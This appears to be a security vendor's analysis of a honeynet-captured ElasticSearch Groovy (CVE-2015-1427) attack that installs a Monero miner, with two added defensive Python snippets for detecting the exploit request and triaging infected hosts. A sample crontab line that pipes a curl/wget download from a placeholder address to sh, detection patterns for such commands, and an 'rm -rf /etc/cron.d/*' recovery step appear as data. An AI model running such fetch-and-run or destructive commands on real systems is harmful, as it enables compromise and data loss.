For secure defense on our E-Planet

The Event Analysis of Antiy Honeynet Capturing “Monero Mining with ElasticSearch Groovy Vulnerability (Dog)”


On June 13, 2019, Antiy's Attack Capture System captured an attack that
exploits the CVE-2015-1427 (ElasticSearch Groovy) remote command
execution vulnerability. Elasticsearch uses Groovy as a scripting
language and relies on a sandbox built from a blacklist and a whitelist
to restrict dangerous code execution; the sandbox is not strict enough
and can be bypassed, which results in remote code execution. Antiy
conducted a detailed analysis of the samples involved in the incident and
gives recommendations for prevention and repair below.

2. Sample Analysis

2.1 Critical Payload

In terms of the payload, the attacker uses Groovy as the scripting
language and sends a JSON script containing a malicious link to the
_search?pretty page in order to download a malicious shell script,
thereby achieving remote code execution and mining.

Figure 2-1 Data Packet Content

After decryption, the core code is:

Figure 2-2 Core Code
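A request-level detection check for the delivery channel described above, added here as an illustration and not code from the Antiy report: it grades Elasticsearch requests by whether a Groovy script arrives through _search and whether that script carries a download URL or a JVM reflection token. The sample requests and the address 198.51.100.7 are constructed for the example.

```python
import json
import re

# Constructed (method, path, body) request records for offline use; they are not
# traffic captured by the Antiy honeynet. 198.51.100.7 is a documentation address.
SAMPLE_REQUESTS = [
    ("GET", "/_cluster/health", ""),
    ("POST", "/logs/_search?pretty", '{"query":{"match_all":{}}}'),
    ("POST", "/_search?pretty",
     '{"size":1,"script_fields":{"x":{"lang":"groovy",'
     '"script":"<script omitted> http://198.51.100.7/x.sh"}}}'),
]
SEARCH_PATH = re.compile(r"/_search(\?|$)")
URL_IN_BODY = re.compile(r"https?://[^\s\"']+")
# JVM reflection / process-execution tokens that never belong in a search script.
SUSPECT_TOKENS = ("Runtime", "ProcessBuilder", "forName", "getClass")

def _collect_scripts(node, found):
    # Recursively gather every object in the body that declares a script language.
    if isinstance(node, dict) and "lang" in node and "script" in node:
        found.append(node)
    kids = node.values() if isinstance(node, dict) else node if isinstance(node, list) else ()
    for child in kids:
        _collect_scripts(child, found)

def classify_request(method, path, body):
    """Grade one request: Groovy scripting via _search is the CVE-2015-1427 delivery
    channel; a download URL or reflection token inside the script raises severity."""
    verdict = {"path": path, "severity": "none", "reasons": []}
    if method != "POST" or not SEARCH_PATH.search(path) or not body:
        return verdict
    try:
        doc = json.loads(body)
    except ValueError:
        verdict.update(severity="low", reasons=["unparseable JSON body on _search"])
        return verdict
    scripts = []
    _collect_scripts(doc, scripts)
    if any(s.get("lang") == "groovy" for s in scripts):
        verdict["severity"] = "medium"
        verdict["reasons"].append("groovy script in search request")
        text = json.dumps(scripts)
        if URL_IN_BODY.search(text):
            verdict["severity"] = "high"
            verdict["reasons"].append("download URL inside script")
        if any(tok in text for tok in SUSPECT_TOKENS):
            verdict["severity"] = "high"
            verdict["reasons"].append("JVM reflection/exec token in script")
    return verdict
```

Run it over an access log or proxy capture by feeding each (method, path, body) triple to classify_request() and alerting on "medium" or above.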

2.2 Sample Analysis

1) Analysis of Intrusion Script—

The attacker downloads and executes the malicious script to implant the
Dog mining program, and then performs a series of operations on the
host, such as scanning.

Figure 2-3 Turn Off the Firewall

After that, the script turns off the firewall, disables SELinux,
releases occupied resources, kills other mining-related processes, sets
up scheduled tasks (downloading the executable file every 30 minutes),
obtains SSH permissions, forwards and modifies the iptables rules, and
cleans up the related command history, logs and other traces.

Figure 2-4 Checks and Kills Other Existing Mining Processes

Figure 2-5 Setting the Timed Task

Figure 2-6 Malicious Script Download Address, Backup Address and Size Settings

Figure 2-7 Clearing Related Logs and History

During this process, the script checks whether the three processes
sysupdate, networkservice and sysguard are running, and starts any that
are not.

Figure 2-8 When One of Them Is Killed, the Schedule File Restarts

2) Sample Analysis—sysguard, networkservice, sysupdate

The three samples are written in Go and packed with UPX. Their
main_main function structures are as follows:

Figure 2-9 The Function Structure of sysguard-main_main

Figure 2-10 The Function Structure of networkservice-main_main

Figure 2-11 sysupdate-main Function

Compared with the previously captured systemctI sample, this attack is
divided into three processes: mining, scanning and function calling.
In addition, the related vulnerability exploitation functions and the
scanning function are found in networkservice.

Figure 2-12 networkservice Scanning Function

Comparing with the previously captured samples, we find that the attack
techniques are similar, except that this attack is carried out jointly
by sysguard, networkservice (scanning) and sysupdate. This also means
that all three processes must be killed if a server is diagnosed as
infected.

3) Configuration File—config.json

In the downloaded configuration file, we find multiple mining pool addresses:

Table 2-1 List of Mining Pools

Mining Pools

Figure 2-13 Configuration File

3. Affected Services and Vulnerabilities

Table 3-1 Affected Services and Vulnerabilities

Services              Vulnerabilities
Weblogic              CVE-2017-10271
Thinkphp5             Remote code execution
Spring Data Commons   CVE-2018-1273
Hadoop                Unauthorized access
ElasticSearch         CVE-2014-3120, CVE-2015-1427
Drupal                CVE-2018-7600
Redis                 Unauthorized access
SQL Server            Weak password


Table 4-1 Attack IP

Geographic Position
USA
China – Heilongjiang – Harbin
US – Colorado – Littleton
China – Henan – Kaifeng
Germany – Hessen – Frankfurt

Table 4-2 URL


Table 4-3 MD5


5. Recommendations for Prevention and Repair

Recommendations for Prevention:

a) Ensure that the system and applications regularly download and install the latest official patches;

b) Prohibit the use of weak passwords;

c) Regularly check the server for anomalies, such as continuously high CPU usage and disk exceptions;

d) Install an endpoint threat protection product such as the Antiy
Intelligent Endpoint Protection System. It can customize a dedicated
security baseline for you to create a secure intranet environment. At
the same time, with its document security protection function, its
whole-network fixed-point virus removal function, and its protection for
domestic operating systems, it can better solve your security problems
and protect your servers.

Recommendations for Recovery:

a) Disconnect the network, back up the important crontab entries, and close or delete the timed tasks: systemctl stop crontab or rm -rf /etc/cron.d/*;

b) Locate the malicious files referenced in the crontab;

c) Check and kill the virus processes: kill the three processes sysguard, networkservice and sysupdate at the same time;

d) Delete virus-related files;

e) After confirming that nothing else is wrong, restart the server,
install the vulnerability patch, and use the Antiy Intelligent Endpoint
Protection System to prevent risk and protect the security of the
server.
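A host triage helper for the process check in section 2.2 and the recovery steps above, added as an example and not part of the Antiy report: it finds the three process names in ps output, flags the 30-minute fetch-and-run crontab entry, and builds a single kill command so that all three processes die together instead of being restarted by a surviving sibling. The ps and crontab text, and the address 203.0.113.5, are constructed samples.

```python
import re

MINER_PROCS = ("sysguard", "networkservice", "sysupdate")  # process names from the report
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")

# Constructed sample data for offline use; not output captured from an infected host.
# 203.0.113.5 is a documentation address standing in for the download/backup address.
SAMPLE_PS = """  PID COMMAND
    1 systemd
  812 sshd
 2041 sysguard
 2042 networkservice
 2050 sysupdate
 2077 bash
"""
SAMPLE_CRON = """*/30 * * * * root (curl -fsSL http://203.0.113.5/u.sh || wget -qO- http://203.0.113.5/u.sh) | sh
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

def find_miner_processes(ps_text):
    """Map each known miner name to its PIDs, given `ps -eo pid,comm` output."""
    hits = {name: [] for name in MINER_PROCS}
    for line in ps_text.splitlines()[1:]:  # first line is the header
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[1].strip() in hits:
            hits[parts[1].strip()].append(int(parts[0]))
    return {name: pids for name, pids in hits.items() if pids}

def find_persistence(cron_text):
    """Flag crontab lines that fetch-and-run every 30 minutes or name a miner process."""
    flagged = []
    for line in cron_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        fetch_and_run = DOWNLOADER.search(s) and PIPE_TO_SHELL.search(s)
        if (s.startswith("*/30 ") and fetch_and_run) or any(n in s for n in MINER_PROCS):
            flagged.append(s)
    return flagged

def kill_command(hits):
    """A single `kill -9` carrying every PID, so no sibling survives to restart the others."""
    pids = sorted(p for plist in hits.values() for p in plist)
    return ["kill", "-9", *map(str, pids)] if pids else []

def triage(ps_text=SAMPLE_PS, cron_text=SAMPLE_CRON):
    hits = find_miner_processes(ps_text)
    return {"processes": hits, "cron": find_persistence(cron_text), "kill": kill_command(hits)}
```

On a live host, pass the output of `ps -eo pid,comm` and the contents of /etc/crontab and the files under /etc/cron.d to triage(); it only reports, so review the result before running the kill command it returns.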
